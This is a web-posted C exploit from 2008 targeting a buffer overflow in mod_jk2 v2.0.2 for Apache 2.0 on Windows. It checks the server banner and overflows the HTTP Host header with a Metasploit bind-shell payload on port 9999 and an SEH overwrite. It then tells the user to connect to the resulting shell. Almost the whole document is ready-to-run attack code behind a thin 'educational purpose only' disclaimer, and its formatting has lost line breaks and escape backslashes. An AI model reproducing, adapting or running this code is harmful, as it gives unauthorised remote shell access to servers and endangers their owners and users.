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Posted on 01 April 2008

/* Dreatica-FXP crew * * ---------------------------------------- * Target : mod_jk2 v2.0.2 for Apache 2.0 Win32 * Found by : IOActive Security Advisory * ---------------------------------------- * Exploit : mod_jk2 v2.0.2 Buffer Overflow Exploit (win32) * Exploit date : 01.03.2008 - 02.03.2008 * Exploit writer : Heretic2 (heretic2x@gmail.com) * OS : Windows ALL * Crew : Dreatica-FXP * ---------------------------------------- * Info : Exploit was found by IOActive Security Advisory, trivial exploit for win32. * The only problem here is that the mod_jk2 forstly downcase all letter in Host * header request, Metasploit v3 have solutions for this case: * 1. Use non-upper encoder * 2. Use non-alpha encoder * i used the first variant here. and all is working good. * ---------------------------------------- * Thanks to: * 1. IOActive Security Advisory ( ) * 2. The Metasploit project ( http://metasploit.com ) * 3. Dreatica-FXP crew ( ) * ---------------------------------------- * This was written for educational purpose only. Use it at your own risk. Author will be not be * responsible for any damage, caused by that code. ************************************************************************************ */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <winsock2.h> #include <ctime> #pragma comment(lib,"ws2_32") void usage(char * s); void logo(); void end_logo(); void prepare_shellcode(unsigned char * fsh, int sh, char * cbip, int cbport, char * url); void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh); int get_version(char * remotehost, int port, int * itarget); int validate_args(char * remotehost, int port, int sh, int itarget); int send_buffer(unsigned char * buf, unsigned int len, char * remotehost, int port); SOCKET do_connect (char *remotehost, int port); // ----------------------------------------------------------------- // XGetopt.cpp Version 1.2 // ----------------------------------------------------------------- int getopt(int argc, char *argv[], char *optstring); char *optarg; // global argument pointer int optind = 0, opterr; // global argv index // ----------------------------------------------------------------- // ----------------------------------------------------------------- struct _target{ const char *t ; unsigned long ret ; } targets[]= { {"mod_jk2/2.0.2 for Apache 2.0.48", 0x100115c3 },// pop,pop,ret {NULL, 0x00000000 } }; struct { const char * name; int length; char * shellcode; }shellcodes[]={ {"Bindshell, port 9999", 461, /* * windows/shell_bind_tcp - 461 bytes * http://www.metasploit.com * Encoder: x86/nonalpha * EXITFUNC=seh, LPORT=9999 */ "x66xb9xffxffxebx19x5ex8bxfex83xc7x6cx8bxd7x3b" "xf2x7dx0bxb0x7bxf2xaexffxcfxacx28x07xebxf1xeb" "x71xe8xe2xffxffxffx11x2ex0fx36x03x2cx32x07x27" "x06x15x30x0fx1ax17x38x0bx13x2dx2bx15x28x15x13" "x13x04x08x27x13x2bx15x26x11x13x24x28x28x28x28" "x28x38x28x38x28x15x13x15x28x13x0bx24x11x2ax26" "x13x24x28x26x13x32x32x24x2bx27x27x26x13x02x02" "x24x26x15x11x17x15x13x18x0ex11x2bx22x11x37x39" "x39x01x13x09x06x37x24x29x2ax2ax2ax11x2ax2ax26" "x2ax13x28x11x24x17x29x13x28xfcx7bxebx7bxe8xf9" "xffxffxffx60x8bx7bx24x24x8bx7bx3cx8bx7cx05x7b" "x01xefx8bx7bx18x8bx5fx20x01xebx7bx8bx34x8bx01" "xeex31xc0x99xacx84xc0x7bx07xc1xcax0dx01xc2xeb" "xf4x3bx7bx24x28x7bxe5x8bx5fx24x01xebx7bx8bx0c" "x7bx8bx5fx1cx01xebx03x2cx8bx89x7bx24x1cx7bxc3" "x31xdbx7bx8bx7bx30x8bx40x0cx8bx7bx1cxadx8bx40" "x08x5ex7bx8ex7bx0execx7bxffxd6x7bx7bx7bx7bx33" "x32x7bx7bx7bx32x5fx7bxffxd0x7bxcbxedxfcx3bx7b" "xffxd6x5fx89xe5x7bx81xedx08x02x7bx7bx02xffxd0" "x7bxd9x09xf5xadx7bxffxd6x7bx7bx7bx7bx7bx7bx7b" "x7bx7bxffxd0x7bx7bx27x0fx7bx7bx89xe1x95x7bxa4" "x1ax7bxc7x7bxffxd6x7bx10x7bx7bxffxd0x7bxa4xad" "x2exe9x7bxffxd6x7bx7bxffxd0x7bxe5x7bx86x7bx7b" "xffxd6x7bx7bx7bx7bxffxd0x93x7bxe7x7bxc6x7bx7b" "xffxd6x7bxffxd0x7bx7bx7bx7bx7bx7bx7bx89xe5x7b" "x7bx7bx29xccx89xe7x7bx7bx89xe2x31xc0xf3xaaxfe" "x7bx2dxfex7bx2cx93x8dx7bx38xabxabxabx7bx7bxfe" "xb3x16xffx7bx7bxffxd6x5bx7bx7bx7bx7bx7bx7bx01" "x7bx7bx7bx7bxffxd0x7bxadxd9x05xcex7bxffxd6x7b" "xffxffx37xffxd0x8bx7bxfcx83xc4x7bxffxd6x7bxff" "xd0x7bxf0x8ax04x5fx7bxffxd6xffxd0" }, {NULL , NULL } }; int main(int argc, char **argv) { char * remotehost=NULL; char default_remotehost[]=""; char temp1[100], temp2[100]; int port, itarget, x, sh; SOCKET s; char c; int option_index=0; logo(); WSADATA wsa; WSAStartup(MAKEWORD(2,0), &wsa); if(argc<2) { usage(argv[0]); return -1; } // set defaults port=80; itarget=-1; sh=0; // ------------ while((c = getopt(argc, argv, "h:p:"))!= EOF) { switch (c) { case 'h': remotehost=optarg; break; case 'p': sscanf(optarg, "%d", &port); break; default: usage(argv[0]); WSACleanup(); return -1; } } if(remotehost == NULL) remotehost=default_remotehost; memset(temp1,0,sizeof(temp1)); memset(temp2,0,sizeof(temp2)); memset(temp1, 'x20' , 58 - strlen(remotehost) -1); printf(" # Host : %s%s# ", remotehost, temp1); sprintf(temp2, "%d", port); memset(temp1,0,sizeof(temp1)); memset(temp1, 'x20' , 58 - strlen(temp2) -1); printf(" # Port : %s%s# ", temp2, temp1); memset(temp1,0,sizeof(temp1)); memset(temp2,0,sizeof(temp2)); sprintf(temp2, "%s", shellcodes[sh].name ); memset(temp1, 'x20' , 58 - strlen(temp2) -1); printf(" # Payload : %s%s# ", temp2, temp1); printf(" # ------------------------------------------------------------------- # "); fflush(stdout); printf(" [+] Checking if server is online "); fflush(stdout); s=do_connect(remotehost, port); if(s==-1) { printf(" [-] Server is OFFLINE "); end_logo(); return 0; } closesocket(s); printf(" [+] Server is ONLINE "); x = get_version(remotehost, port, &itarget); if(x<0) { printf(" [-] Cannot exploit due to errors "); WSACleanup(); end_logo(); return -1; } unsigned char buf[10000]; unsigned int len; memset(buf,0,sizeof(buf)); fflush(stdout); make_buffer(buf, &len, itarget, sh); printf(" [+] Attacking buffer constructed "); if(send_buffer(buf, len, remotehost,port)==-1) { printf(" [-] Cannot exploit server %s ", remotehost); end_logo(); WSACleanup(); return -1; } printf(" [+] Buffer sent "); printf(" [+] Connect to %s:%d ", remotehost, 9999); end_logo(); WSACleanup(); return 0; } SOCKET do_connect (char *remotehost, int port) { static struct hostent *host; static struct sockaddr_in addr; SOCKET s; host = gethostbyname(remotehost); if (!host) { perror(" [-] gethostbyname() failed"); return -1; } addr.sin_addr = *(struct in_addr*)host->h_addr; s = socket(PF_INET, SOCK_STREAM, 0); if (s == -1) { closesocket(s); perror("socket() failed"); return -1; } addr.sin_port = htons(port); addr.sin_family = AF_INET; if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1) { closesocket(s); return -1; } return s; } int get_version(char * remotehost, int port, int * target) { char bufmax[4096], * lp, *lp2, WebBanner[1000], Version[1000], ModJK[1000]; int bytes,j,x; SOCKET sock; memset(bufmax,0,sizeof(bufmax)); memset(WebBanner,0,sizeof(WebBanner)); memset(Version,0,sizeof(Version)); memset(ModJK,0,sizeof(ModJK)); sock = do_connect(remotehost, port); if (sock == -1) return -1; send(sock, "GET /a.html HTTP/1.0 ",(int)strlen("GET /a.html HTTP/1.0 "),0); if ((bytes = recv(sock, bufmax, sizeof(bufmax),0 )) <= 0) return -1; bufmax[sizeof(bufmax)-1]=0; if((lp=strstr(bufmax,"Server:"))==NULL) return -1; if((lp2=strstr(lp," "))==NULL) return -1; strncpy(WebBanner, lp, lp2-lp); if((lp=strstr(WebBanner,"Win32"))==NULL) { printf(" [-] OS is not a Win32 "); return -1; } if((lp=strstr(WebBanner,"Apache/"))==NULL) { printf(" [-] No Apache "); return -1; } if(lp+strlen("Apache/")>WebBanner+strlen(WebBanner)-1) return -1; lp+=strlen("Apache/"); if((lp2=strstr(lp," "))==NULL) return -1; strncpy(Version, lp, lp2-lp); printf(" [+] Version of Apache is %s ", Version); x=0; for(j=0; targets[j].t!=0;j++) { if(strstr(targets[j].t,Version)!=NULL) { x=1; break; } } if(x==0) { printf(" [-] This version of Apache is UNSUPPORTED "); return -1; } printf(" [+] This version of Apache is SUPPORTED "); strncpy(WebBanner, lp, lp2-lp); if((lp=strstr(WebBanner,"mod_jk2/"))==NULL) { printf(" [-] No mod_jk2 "); return -1; } if((lp2=strstr(lp," "))==NULL) lp2=WebBanner+strlen(WebBanner); strncpy(ModJK, lp, lp2-lp); printf(" [+] mod_jk2 is %s ", ModJK); x=0; for(j=0; targets[j].t!=0;j++) { if(strstr(targets[j].t,ModJK)!=NULL) { *target=j; x=1; break; } } if(x==0) { printf(" [-] This version of mod_jk2 is UNSUPPORTED "); return -1; } printf(" [+] This version of mod_jk2 is SUPPORTED "); return 0; } void prepare_shellcode(unsigned char * fsh, unsigned int * fshlength, int sh) { memcpy(fsh, shellcodes[sh].shellcode, shellcodes[sh].length); *fshlength = shellcodes[sh].length; } void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh) { // prepare shellcode unsigned char fsh[10000]; unsigned int fshlength; memset(fsh, 0, sizeof(fsh)); prepare_shellcode(fsh, &fshlength, sh); // ----------------- // make buffer unsigned char * cp=buf; // begin of the HTTP request memcpy(cp, "GET / HTTP/1.0 Host: ", strlen("GET / HTTP/1.0 Host: ") ); cp+=strlen((char *)cp); // jff *cp++='x90'; *cp++='x90'; *cp++='x90'; *cp++='x90'; // overflowing memset(cp, 'x41', 5001); // put the shellcode memcpy(cp, fsh, fshlength); cp+=1271; // calculating backward jump int jmp_bytes=0xffffffff - (1275); // putting backward jump *cp++ = 'xe9'; *cp++ = (char)((jmp_bytes ) & 0xff); *cp++ = (char)((jmp_bytes >> 8) & 0xff); *cp++ = (char)((jmp_bytes >> 16) & 0xff); *cp++ = (char)((jmp_bytes >> 24) & 0xff); // next SEH record and back jump *cp++='x90'; *cp++='x90'; *cp++='xeb'; *cp++='xf7'; // replace SEH *cp++ = (char)((targets[itarget].ret ) & 0xff); *cp++ = (char)((targets[itarget].ret >> 8) & 0xff); *cp++ = (char)((targets[itarget].ret >> 16) & 0xff); *cp++ = (char)((targets[itarget].ret >> 24) & 0xff); // trigger exception cp+=3000; // copy the last part of the request memcpy(cp, " ", strlen(" ") ); cp+=strlen((char *)cp); } int send_buffer(unsigned char * buf, unsigned int len, char * remotehost, int port) { SOCKET sock; sock = do_connect(remotehost, port); if (sock<0) return -1; if (send(sock, (char *)buf,(int)strlen((char *)buf),0)<=0) return -1; closesocket(sock); return 1; } // ----------------------------------------------------------------- // XGetopt.cpp Version 1.2 // ----------------------------------------------------------------- int getopt(int argc, char *argv[], char *optstring) { static char *next = NULL; if (optind == 0) next = NULL; optarg = NULL; if (next == NULL || *next == '') { if (optind == 0) optind++; if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '') { optarg = NULL; if (optind < argc) optarg = argv[optind]; return EOF; } if (strcmp(argv[optind], "--") == 0) { optind++; optarg = NULL; if (optind < argc) optarg = argv[optind]; return EOF; } next = argv[optind]; next++; // skip past - optind++; } char c = *next++; char *cp = strchr(optstring, c); if (cp == NULL || c == ':') return '?'; cp++; if (*cp == ':') { if (*next != '') { optarg = next; next = NULL; } else if (optind < argc) { optarg = argv[optind]; optind++; } else { return '?'; } } return c; } // ----------------------------------------------------------------- // ----------------------------------------------------------------- // ----------------------------------------------------------------- void usage(char * s) { printf(" "); printf(" Usage: %s -h <host> -p <port> ", s); printf(" ------------------------------------------------------------------- "); printf(" Arguments: "); printf(" -h ........ host to attack "); printf(" -p ........ port to use "); printf(" "); printf(" Supported mod_jk versions: "); for(int j=0; targets[j].t!=0;j++) { printf(" %d. %s ",j+1, targets[j].t); } printf(" "); printf(" Execution: %s ", shellcodes[0].name); end_logo(); } void logo() { printf(" "); printf(" ####################################################################### "); printf(" # ____ __ _ ______ __ _____ # "); printf(" # / __ \________ _____/ /_(_)_________ / __/\ \/ / / _ / # "); printf(" # / / / / ___/ _ \/ __ / __/ / ___/ __ / ___ / / \ / / // / # "); printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \ / ___/ # "); printf(" # /_____/_/ \___/ \_,_/\__/_/\___/\__,_/ /_/ /_/\_\/_/ # "); printf(" # crew # "); printf(" ####################################################################### "); printf(" # Exploit : mod_jk2 v2.0.2 for Apache 2.0 # "); printf(" # Author : Heretic2 # "); printf(" # THANKS : IOActive and The Metasploit Project # "); printf(" # Research: IOActive Security Advisory # "); printf(" # Version : 1.0 # "); printf(" # System : Windows ALL # "); printf(" # Date : 01.03.2008 - 02.03.2008 # "); printf(" # ------------------------------------------------------------------- # "); } void end_logo() { printf(" # ------------------------------------------------------------------- # "); printf(" # Dreatica-FXP crew [Heretic2] # "); printf(" ####################################################################### "); }